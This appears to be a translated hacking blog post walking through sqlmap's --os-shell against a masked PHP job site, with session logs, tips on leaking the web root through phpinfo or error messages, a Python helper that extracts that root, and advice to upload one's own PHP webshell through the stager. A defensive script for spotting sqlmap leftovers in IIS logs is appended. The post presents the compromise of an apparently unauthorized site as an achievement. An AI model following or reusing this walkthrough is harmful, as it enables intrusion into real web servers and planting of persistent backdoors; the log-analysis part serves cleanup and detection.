Adapted from http://www.2cto.com/Article/201206/138091.html
I tweaked it a bit - = it's good enough to get by; anyway, I damn well got a shell.
Log starts here.
sqlmap.py -u "http://www.****.cn/job/index.php?key=1" --os-shell
[14:39:11] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003
web application technology: Microsoft IIS 6.0, PHP 5.2.9
back-end DBMS: MySQL 5.0
[14:39:11] [INFO] going to use a web backdoor for command prompt
[14:39:11] [INFO] fingerprinting the back-end DBMS operating system
[14:39:12] [INFO] the back-end DBMS operating system is Windows
[14:39:12] [INFO] trying to upload the file stager
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] PHP (default)
[4] JSP
>
This is a PHP site, of course, so we pick 3, PHP (default).
[14:42:09] [WARNING] unable to retrieve the web server document root
please provide the web server document root [C:/xampp/htdocs/,C:/Inetpub/wwwroot/]:
Don't know the path? - - Point a directory scanner at the site and look for phpinfo.php or any other file that prints it; a PHP warning or fatal error that shows a full script path gives it away just as well.
Once you have the path, type it into the prompt that just came up.
[14:42:09] [WARNING] unable to retrieve the web server document root
please provide the web server document root [C:/xampp/htdocs/,C:/Inetpub/wwwroot/]:E:/Web/ygbh
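For the "find the document root" step, here is an added example of my own (not code from the original post, the 2cto article, or sqlmap) that pulls DOCUMENT_ROOT out of a saved phpinfo() page, falls back to SCRIPT_FILENAME minus SCRIPT_NAME when DOCUMENT_ROOT is blank or missing, and as a last resort takes IIS's APPL_PHYSICAL_PATH. The phpinfo rows in it are constructed to look like real phpinfo() HTML; E:/Web/ygbh is reused from the session above, and the job/ subdirectory is made up.

```python
"""
Pull the web server document root out of a saved phpinfo() page.

Added example, not from the original post or from sqlmap. The phpinfo
rows below are constructed; E:/Web/ygbh is the path from the session above.
"""
import html
import re
from typing import Dict, Optional

# phpinfo() renders every variable as <td class="e">NAME</td><td class="v">VALUE</td>.
# NAME appears as DOCUMENT_ROOT (server environment table) or as
# _SERVER["DOCUMENT_ROOT"] / $_SERVER['DOCUMENT_ROOT'] (PHP Variables table).
_ROW = re.compile(
    r'<td class="e">\s*(?P<name>[^<]*?)\s*</td>\s*<td class="v">\s*(?P<value>[^<]*?)\s*</td>',
    re.IGNORECASE,
)
_SERVER_KEY = re.compile(r"""^\$?_SERVER\[["']?(.*?)["']?\]$""")


def phpinfo_vars(page: str) -> Dict[str, str]:
    """{NAME: VALUE} for every two-column row; a non-empty value is never overwritten by an empty one."""
    out: Dict[str, str] = {}
    for m in _ROW.finditer(page):
        name = _SERVER_KEY.sub(r"\1", html.unescape(m.group("name")))
        value = html.unescape(m.group("value"))
        if not out.get(name):
            out[name] = value
    return out


def normalise_path(p: str) -> str:
    """Forward slashes and no trailing slash, the form sqlmap's prompt shows."""
    return p.replace("\\", "/").rstrip("/")


def document_root(page: str) -> Optional[str]:
    """Best-effort document root, or None if the page leaks nothing usable."""
    v = phpinfo_vars(page)
    if v.get("DOCUMENT_ROOT"):
        return normalise_path(v["DOCUMENT_ROOT"])
    # Fallback: absolute script path minus its URL path, e.g.
    # E:/Web/ygbh/job/phpinfo.php minus /job/phpinfo.php -> E:/Web/ygbh
    fn, sn = v.get("SCRIPT_FILENAME", ""), v.get("SCRIPT_NAME", "")
    if fn and sn:
        fn, sn = normalise_path(fn), normalise_path(sn)
        if sn and fn.lower().endswith(sn.lower()):
            return fn[: len(fn) - len(sn)]
    # Last resort on IIS: the application's physical root. This may be a
    # sub-application rather than the site root, so treat it with suspicion.
    if v.get("APPL_PHYSICAL_PATH"):
        return normalise_path(v["APPL_PHYSICAL_PATH"])
    return None


# Constructed sample 1: DOCUMENT_ROOT filled in, Windows backslashes.
SAMPLE_APACHE_STYLE = """
<tr><td class="e">DOCUMENT_ROOT </td><td class="v">E:\\Web\\ygbh\\ </td></tr>
<tr><td class="e">SCRIPT_FILENAME </td><td class="v">E:\\Web\\ygbh\\phpinfo.php </td></tr>
"""

# Constructed sample 2: DOCUMENT_ROOT empty, PHP 5 style keys, script in a subdirectory.
SAMPLE_IIS_STYLE = """
<tr><td class="e">$_SERVER['DOCUMENT_ROOT']</td><td class="v"></td></tr>
<tr><td class="e">$_SERVER['SCRIPT_FILENAME']</td><td class="v">E:\\Web\\ygbh\\job\\phpinfo.php</td></tr>
<tr><td class="e">$_SERVER['SCRIPT_NAME']</td><td class="v">/job/phpinfo.php</td></tr>
"""

if __name__ == "__main__":
    print(document_root(SAMPLE_APACHE_STYLE))
    print(document_root(SAMPLE_IIS_STYLE))
```

Save the phpinfo page with wget or curl and feed its text to document_root(); the value it returns is what goes into sqlmap's document root prompt.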
After you hit Enter it prints a couple more lines asking for extra directories to try uploading the agent to. Just press Enter again and leave it blank.
[14:44:35] [WARNING] unable to retrieve any web server path
please provide any additional web server full path to try to upload the agent [Enter for None]:
After Enter, sqlmap turns into this:
[14:45:53] [INFO] the file stager has been successfully uploaded on 'E:/Web/ygbh' ('http://www.****.cn:80/tmpuodot.php')
[14:45:53] [INFO] the backdoor has probably been successfully uploaded on 'E:/Web/ygbh', go with your browser to 'http://www.****.cn:80//tmpbcmnd.php' and enjoy it!
[14:45:53] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell>
- - tmpuodot.php and tmpbcmnd.php: notice there are two files!! Two files!! The 九区 write-up probably misread this.
One is the file stager (the upload form)! The other is the backdoor that runs commands! Two files! Both of them stay on the server after you leave os-shell; sqlmap does not remove them, so on an engagement write down both paths and delete them when you're done.
Open http://www.****.cn/tmpuodot.php and upload your own PHP webshell through it - = and leave the other one alone.
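Since both files stay behind, here is the flip side as an added example of my own (not from the original post or from sqlmap) for whoever has to investigate or clean up afterwards: it walks IIS W3C log lines and flags every hit on sqlmap's stager/backdoor names, tmpu<4 letters>.<ext> and tmpb<4 letters>.<ext>, which is where tmpuodot.php and tmpbcmnd.php above came from, lists the client IPs that showed up with sqlmap's default User-Agent (it starts with sqlmap/), and builds the filesystem paths to delete. The log lines, IPs, timestamps, the User-Agent string and the field order are all constructed; check the #Fields: header of your own logs.

```python
"""
Find sqlmap --os-shell leftovers in IIS W3C logs.

Added example, not from the original post or from sqlmap itself. Every log
line below is constructed: the IPs, times and the sqlmap User-Agent string
are made up to look like the session in the post.
"""
import re
from dataclasses import dataclass
from typing import Dict, Iterator, List, Set

# sqlmap drops two files: tmpu<4 lowercase letters>.<ext> is the file stager
# (an upload form) and tmpb<4 lowercase letters>.<ext> is the backdoor that
# runs commands. The session above produced tmpuodot.php and tmpbcmnd.php.
ARTIFACT = re.compile(r"/tmp(?P<kind>[ub])[a-z]{4}\.(?:php|asp|aspx|jsp)$", re.IGNORECASE)

# Assumed default field order for IIS 6 W3C extended logging; a #Fields:
# line in the log itself overrides it.
DEFAULT_FIELDS = ["date", "time", "s-ip", "cs-method", "cs-uri-stem", "cs-uri-query",
                  "s-port", "cs-username", "c-ip", "cs(User-Agent)", "sc-status"]


@dataclass
class Hit:
    when: str
    client: str
    method: str
    path: str
    kind: str    # "stager" or "backdoor"
    status: str


def parse_w3c(lines: List[str]) -> Iterator[Dict[str, str]]:
    """Yield one {field: value} dict per request line, honouring #Fields: headers."""
    fields = DEFAULT_FIELDS
    for line in lines:
        line = line.strip()
        if not line:
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#"):          # other directives (#Software, #Date, ...)
            continue
        yield dict(zip(fields, line.split(" ")))


def find_os_shell_artifacts(lines: List[str]) -> List[Hit]:
    """Every request to a file whose name matches sqlmap's stager/backdoor pattern."""
    hits: List[Hit] = []
    for rec in parse_w3c(lines):
        m = ARTIFACT.search(rec.get("cs-uri-stem", ""))
        if m:
            hits.append(Hit(
                when=rec.get("date", "") + " " + rec.get("time", ""),
                client=rec.get("c-ip", ""),
                method=rec.get("cs-method", ""),
                path=rec["cs-uri-stem"],
                kind="stager" if m.group("kind").lower() == "u" else "backdoor",
                status=rec.get("sc-status", ""),
            ))
    return hits


def sqlmap_clients(lines: List[str]) -> Set[str]:
    """Client IPs that sent sqlmap's default User-Agent (it starts with 'sqlmap/')."""
    return {rec.get("c-ip", "") for rec in parse_w3c(lines)
            if rec.get("cs(User-Agent)", "").startswith("sqlmap/")}


def dropped_paths(hits: List[Hit], docroot: str) -> Set[str]:
    """Filesystem paths to delete, given the document root the stager was written to."""
    return {docroot.rstrip("/") + h.path for h in hits}


# Constructed log excerpt (IIS W3C, single-space separated, UA spaces as '+').
# The cmd=whoami query on the backdoor hit is a made-up command value.
SAMPLE_LOG = """
#Software: Microsoft Internet Information Services 6.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2012-06-05 06:45:50 10.0.0.5 GET /job/index.php key=1 80 - 203.0.113.7 sqlmap/0.9+(http://sqlmap.sourceforge.net) 200
2012-06-05 06:45:52 10.0.0.5 GET /tmpuodot.php - 80 - 203.0.113.7 sqlmap/0.9+(http://sqlmap.sourceforge.net) 200
2012-06-05 06:45:53 10.0.0.5 POST /tmpuodot.php - 80 - 203.0.113.7 sqlmap/0.9+(http://sqlmap.sourceforge.net) 200
2012-06-05 06:45:53 10.0.0.5 GET /tmpbcmnd.php cmd=whoami 80 - 203.0.113.7 sqlmap/0.9+(http://sqlmap.sourceforge.net) 200
2012-06-05 06:46:10 10.0.0.5 GET /index.php - 80 - 198.51.100.20 Mozilla/5.0+(Windows+NT+5.1) 200
""".strip().splitlines()

if __name__ == "__main__":
    found = find_os_shell_artifacts(SAMPLE_LOG)
    for h in found:
        print(h)
    print("sqlmap clients:", sqlmap_clients(SAMPLE_LOG))
    print("delete:", dropped_paths(found, "E:/Web/ygbh"))
```

The name pattern is the cheap, reliable signal; the User-Agent check only catches people who didn't bother with --user-agent or --random-agent, so treat an empty sqlmap_clients() result as "not proven", not "not sqlmap".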
Done!